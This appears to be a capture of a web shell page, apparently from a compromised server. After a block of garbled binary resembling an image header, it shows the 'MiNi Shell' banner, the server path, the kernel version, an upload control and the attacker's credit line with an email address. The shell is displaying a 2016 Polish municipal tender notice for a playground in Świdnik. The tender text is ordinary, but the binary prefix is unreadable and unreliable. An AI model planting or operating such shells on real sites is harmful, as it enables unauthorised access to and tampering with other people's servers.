JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20160408/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20160408/82916-N-2016.html

<p class="kh_header"><b>Świdnik: Nowoczesny plac zabaw z infrastrukturą sportową na osiedlu Wschód</b><br>
<b>Numer ogłoszenia: 82916 - 2016; data zamieszczenia: 08.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska  Świdnik , ul. Kard. St. Wyszyńskiego 15, 21-040 Świdnik, woj. lubelskie, tel. (081) 468 66 25, faks 081 751 76 08.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.umswidnik.bip.lubelskie.pl/</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Nowoczesny plac zabaw z infrastrukturą sportową na osiedlu Wschód.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest wykonanie usług i robót budowlanych pod nazwą Nowoczesny plac zabaw z infrastrukturą sportową na osiedlu Wschód.
1.1.Zakres przedmiotu zamówienia:
1) Dokumentacja
a) Dokumentacja projektowa
b) Opinie, uzgodnienia, wnioski, pozwolenia
c) Specyfikacje techniczne wykonania i odbioru robót budowlanych
2) Roboty budowlane
1.2. Dokumentacja projektowa 
1) Dokumentacja projektowa w zakresie niezbędnym do pozyskania pozwolenia na budowę,  i/ lub zgłoszenia robót budowlanych nie wymagających pozwolenia na budowę, w imieniu Zamawiającego
2) Informacja BIOZ
1.3. Opinie, uzgodnienia, wnioski, pozwolenia
1) Wszystkie wymagane prawem opinie, warunki techniczne do projektowania i uzgodnienia
2) Oświadczenie o prawie do dysponowania nieruchomością na cele budowlane
3) Zgłoszenie dotyczące robót budowlanych oraz brak sprzeciwu organu wykonania robót budowlanych nie wymagających pozwolenia na budowę, i/lub wniosek oraz pozwolenie na budowę 
1.4. Roboty budowlane
1.4.1. Roboty budowlane oraz urządzenia zabawowe i sportowe 
1) Nawierzchnia syntetyczna i podbudowa placu zabaw
a) minimalna powierzchnia - 200 m2
b) nawierzchnia syntetyczna gumowa układana na klej na betonie 
c) nawierzchnia z płyt 50 * 50 cm, o grubości minimalnej 4,50 cm; warstwa wierzchnia płyt   z SBR w kolorze zielonym
d) nawierzchnia amortyzująca upadek dziecka z wysokości minimum - 150 cm
e) nawierzchnia placu zabaw obramiona obrzeżem betonowym 8*30 cm na ławie z oporem
f) podbudowa pod nawierzchnię syntetyczną placu zabaw - warstwa piasku o grubości 20 cm, warstwa podkładu o grubości  15 cm z betonu C12/15
2) Ogrodzenie z furtką
a) kolor zielony
b) furtka o szerokości 110 cm wyposażona w zamek, blokadę zamykania i odbój
c) długość ogrodzenia (placu zabaw o powierzchni minimum 200,00 m2) w zależności od usytuowania i kształtu placu zabaw - 1 komplet
d) wysokość ogrodzenia - ok. 110 cm (w tym element stalowy ogrodzenia min. 100 cm)
e) minimalna średnica prętów w ogrodzeniu - 8 mm
f) fundamenty
g) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
3) Chodnik do placu zabaw o szerokości min. 120 cm z kostki betonowej gr. 6 cm na podbudowie betonowej, w obrzeżach betonowych 8*30 cm na ławie z oporem
4) Zestaw zabawowy 1 szt. 
a) 2 wieże (h podłogi = ok. 120 cm)
b) 2 pomosty
c) 3 podesty
d) zjeżdżalnia ze ślizgiem ze stali nierdzewnej
e) rura strażacka
f) inne elementy powiązane z w/w oraz ewentualnie urządzenia dodatkowe
g) minimalna wysokość swobodnego upadku - 120 cm
h) minimalna ilość użytkowników korzystających równocześnie z zestawu - 12 osób
i) daszki, boki i podesty ze sklejki wodoodpornej
k) fundamenty
l) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
5) Huśtawka 1 szt. 
a) minimalna długość - 250 cm
b) minimalna wysokość swobodnego upadku - 120 cm
c) maksymalna ilość użytkowników korzystających równocześnie z huśtawki - 2 osoby
d) fundamenty
e) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
6) Huśtawka ważka 1 szt. 
a) minimalna długość - 300 cm
b) minimalna wysokość swobodnego upadku - 60 cm
c) maksymalna ilość użytkowników korzystających równocześnie z huśtawki - 2 osoby
d) wysokość od 60 do 70 cm
e) fundamenty
f) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
7) Dom 1 szt. 
a) minimalne wymiary domu 220 * 120 * 200 cm
b) minimalna ilość użytkowników korzystających równocześnie z domu - 5 osób
c) część składową domu stanowić będzie weranda
d) fundamenty
e) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
f) pozostałe elementy ze sklejki wodoodpornej
8) Karuzela tarczowa z siedzeniami 1 szt. 
a) minimalna średnica karuzeli 1,40 cm
b) minimalna ilość użytkowników korzystających równocześnie z karuzeli - 4 osoby 
c) wysokość karuzeli - minimum 80 cm
d) podłoga pełna z blachy ryflowanej stalowej  lub nierdzewnej 
e) fundamenty
f) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
9) Urządzenie do bujania 1 szt.
a) wygląd imitujący zwierzątko
b) ilość użytkowników korzystających równocześnie z urządzenia - 1 osoba 
c) konstrukcja na sprężynie stalowej 
d) fundament
e) konstrukcja ze sklejki wodoodpornej
10) Urządzenie do bujania 1 szt. 
a) wygląd imitujący roślinę
b) ilość użytkowników korzystających równocześnie z urządzenia - 4 osoby
c) konstrukcja na sprężynie stalowej 
d) fundament
e) konstrukcja ze sklejki wodoodpornej
11) Tablica z regulaminem 1 szt. 
a) minimalna wysokość 170 cm
b) na tablicy regulamin określający zasady i warunki korzystania z placu oraz wskazujący,   na wypadek zaistnienia sytuacji zagrażającej bezpieczeństwu osób korzystających z placu, numer telefonu zarządcy placu oraz numery telefonów alarmowych
c) fundament
d) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
12) Ławka z oparciem 2 szt.
a) minimalna długość - 150 cm
b) maksymalna ilość użytkowników korzystających równocześnie z ławki - 3 osoby
c) siedzisko i oparcie z drewna zabezpieczonego na działanie warunków atmosferycznych
d) fundament
e) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
13) Masażer na pylonie 1 szt.
a) wysokość - ok. 200 cm
b) ilość użytkowników korzystających równocześnie z urządzenia - 2 osoby
c) instrukcja użytkowania opisana na urządzeniu
d) zastosowane łożyska typu zamkniętego
e) minimalna średnica rur stalowych głównej ramy - 90 mm 
f) fundament
g) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
14) Drabinka i podciąg nóg na pylonie 1 szt.
a) wysokość - ok. 200 cm
b) ilość użytkowników korzystających równocześnie z urządzenia - 2 osoby
c) instrukcja użytkowania opisana na urządzeniu
d) zastosowane łożyska typu zamkniętego
e) minimalna średnica rur stalowych głównej ramy - 90 mm 
f) fundament
g) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
15) Jeździec na pylonie 1 szt.
a) wysokość - ok. 200 cm
b) ilość użytkowników korzystających równocześnie z urządzenia - 2 osoby
c) instrukcja użytkowania opisana na urządzeniu
d) zastosowane łożyska typu zamkniętego
e) minimalna średnica rur stalowych głównej ramy - 90 mm
f) fundament
g) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
16)  Orbitrek na pylonie 1 szt.
a) wysokość - ok. 200 cm
b) ilość użytkowników korzystających równocześnie z urządzenia - 2 osoby
c) instrukcja użytkowania opisana na urządzeniu
d) zastosowane łożyska typu zamkniętego
e) minimalna średnica rur stalowych głównej ramy - 90 mm
f) fundament
g) konstrukcja stalowa ocynkowana i malowana farbami proszkowymi
17) Plac zabaw z bezpiecznych i trwałych materiałów, wyposażony w sztuczną nawierzchnię, urządzenia zabawowe i sportowe spełniające Polskie Normy m. in. - PN-EN 1176  i PN-EN 1177 oraz posiadające certyfikat bezpieczeństwa B lub porównywalny
18) Urządzenia zabawowe oraz sportowe odporne na warunki atmosferyczne, do użytku publicznego, rozmieszczone na placu zabaw w sposób umożliwiający zachowanie bezpiecznych stref pomiędzy nimi
19) Wielkość i głębokość posadowienia fundamentów zgodnie z wymogami producenta urządzeń
20) Ziemię z wykopów oraz materiały rozbiórkowe zagospodaruje Wykonawca swoim staraniem; zagęszczenie podłoża gruntowego Is większe lub równe 1.0
21) Wszystkie użyte do wykonania materiały, wyroby budowlane, urządzenia i sprzęt  muszą posiadać niezbędne atesty, aprobaty i certyfikaty
1.4.2. Inwentaryzacja powykonawcza
1.4.3. Instrukcja konserwacji, użytkowania i ochrony oraz regulamin korzystania z obiektu 
1.4.4. Szkolenie przedstawicieli Zamawiającego w zakresie konserwacji, użytkowania, ochrony i korzystania z obiektu
1.5. Przedmiot zamówienia określa
a) Program funkcjonalno - użytkowy
Jeżeli dokumentacja przetargowa wskazywałyby w odniesieniu do niektórych materiałów lub urządzeń znaki towarowe, patenty lub pochodzenie - zamawiający, zgodnie z art. 29 ust. 3 ustawy Pzp, dopuszcza oferowanie materiałów lub urządzeń równoważnych. Materiały lub urządzenia pochodzące od konkretnych producentów określają minimalne parametry jakościowe i cechy użytkowe, jakim muszą odpowiadać materiały lub  urządzenia oferowane przez wykonawcę, aby zostały spełnione wymagania stawiane przez zamawiającego. Materiały lub urządzenia pochodzące od konkretnych producentów stanowią wyłącznie wzorzec jakościowy przedmiotu zamówienia. Pod  pojęciem minimalne parametry jakościowe i cechy użytkowe zamawiający rozumie wymagania dotyczące materiałów lub urządzeń zawarte w ogólnie dostępnych źródłach, katalogach, stronach internetowych producentów. Operowanie przykładowymi nazwami producenta ma jedynie na celu doprecyzowanie poziomu oczekiwań zamawiającego w stosunku do określonego rozwiązania. Posługiwanie się nazwami producentów/produktów ma wyłącznie charakter przykładowy. Zamawiający, wskazując oznaczenie konkretnego producenta (dostawcy) lub konkretny produkt przy opisie przedmiotu zamówienia, dopuszcza jednocześnie produkty równoważne o parametrach jakościowych i cechach użytkowych co  najmniej na poziomie parametrów wskazanego produktu, uznając tym samym każdy produkt o wskazanych lub lepszych parametrach. 
W takiej sytuacji zamawiający wymaga złożenia stosownych dokumentów, uwiarygadniających te materiały lub urządzenia..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.10.00.00-8, 45.20.00.00-9, 45.11.00.00-1, 45.21.00.00-2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 100.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 2000 PLN</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca musi wykazać, że w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia jest krótszy- w tym okresie, zgodnie z zasadami sztuki budowlanej wykonał  i prawidłowo ukończył  zamówienia o łącznej wartości na minimum 150.000,00 złotych, w tym:
- budowę lub przebudowę placów zabaw lub/i
- roboty budowlane.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu spełnienia tego warunku Wykonawca musi wykazać, że posiada opłaconą polisę, a w przypadku jej braku - inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie  prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na kwotę nie niższą niż 100 000zł.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Dokument potwierdzający wniesienie wadium w formie gwarancji/poręczenia. 2.W przypadku, gdy wykonawcę reprezentuje pełnomocnik - pełnomocnictwo określające jego zakres i podpisane przez osoby uprawnione do reprezentacji wykonawcy. 3.W przypadku, gdy ofertę składają wykonawcy ubiegający się wspólnie o udzielenie zamówienia wymagane jest załączenie dokumentu pełnomocnictwa określającego zakres umocowania pełnomocnika ustanowionego do reprezentowania ich w postępowaniu, stosownie do art. 23 ust. 2 ustawy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 95</li>
<li>2 - Rękojmia i gwarancja - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zmiany w umowie można wprowadzić za zgodą obu stron na piśmie, w formie aneksu.
2. Zamawiający dopuszcza możliwość zmiany umowy w następującym zakresie i na warunkach:
2.1 Zmiana terminu realizacji przedmiotu umowy, gdy jest ona spowodowana:
a) warunkami atmosferycznymi - w szczególności długotrwałymi opadami deszczu lub śniegu, porywistym wiatrem, niskimi i wysokimi temperaturami powietrza, które to przyczyny uniemożliwiają lub utrudniają w wysokim stopniu wykonanie robót zgodnie z technologią i przepisami bhp,
b) ujawnieniem niewybuchów i niewypałów wymagających wstrzymania robót i dokonania ich usunięcia przez specjalistyczne służby,
c) siłą wyższą w rozumieniu przepisów Kodeksu Cywilnego,
d) wydłużeniem terminów uzyskania niezbędnych uzgodnień i decyzji przez Wykonawcę i Zamawiającego, pomimo dopełnienia przez Wykonawcę i Zamawiającego należytej staranności,
e) wydłużeniem terminów uzyskania niezbędnych uzgodnień dokumentacji projektowej przez Wykonawcę, pomimo dopełnienia przez Wykonawcę należytej staranności.
Informacja o powyższych faktach musi być potwierdzona przez inspektora nadzoru i przekazana Zamawiającemu na piśmie.
W przypadku wystąpienia opóźnień spowodowanych wyżej wymienionymi okolicznościami, strony ustalą nowe terminy, z tym że maksymalny okres przesunięcia terminu zakończenia realizacji przedmiotu umowy równy będzie okresowi uzasadnionej przerwy lub przestoju.
3. Warunkiem dokonania zmian, o których mowa w ust. 2 jest złożenie wniosku przez stronę inicjującą zmianę i uzyskanie zgody drugiej strony umowy.
4. Bez zgody Zamawiającego mogą być wykonywane jedynie prace mające na celu niezwłoczne zapobieżenie awarii, szkodzie lub utracie życia i zdrowia, o czym Wykonawca zobowiązany jest natychmiast zawiadomić Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://umswidnik.bip.lubelskie.pl/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miasta Świdnik, 21-040 Świdnik ul.Kard.St.Wyszyńskiego 15 , pok. 218..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 25.04.2016 godzina 12:00, miejsce: Urząd Miasta Świdnik, 21-040 Świdnik ul.Kard.St.Wyszyńskiego 15 , pok. 105.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com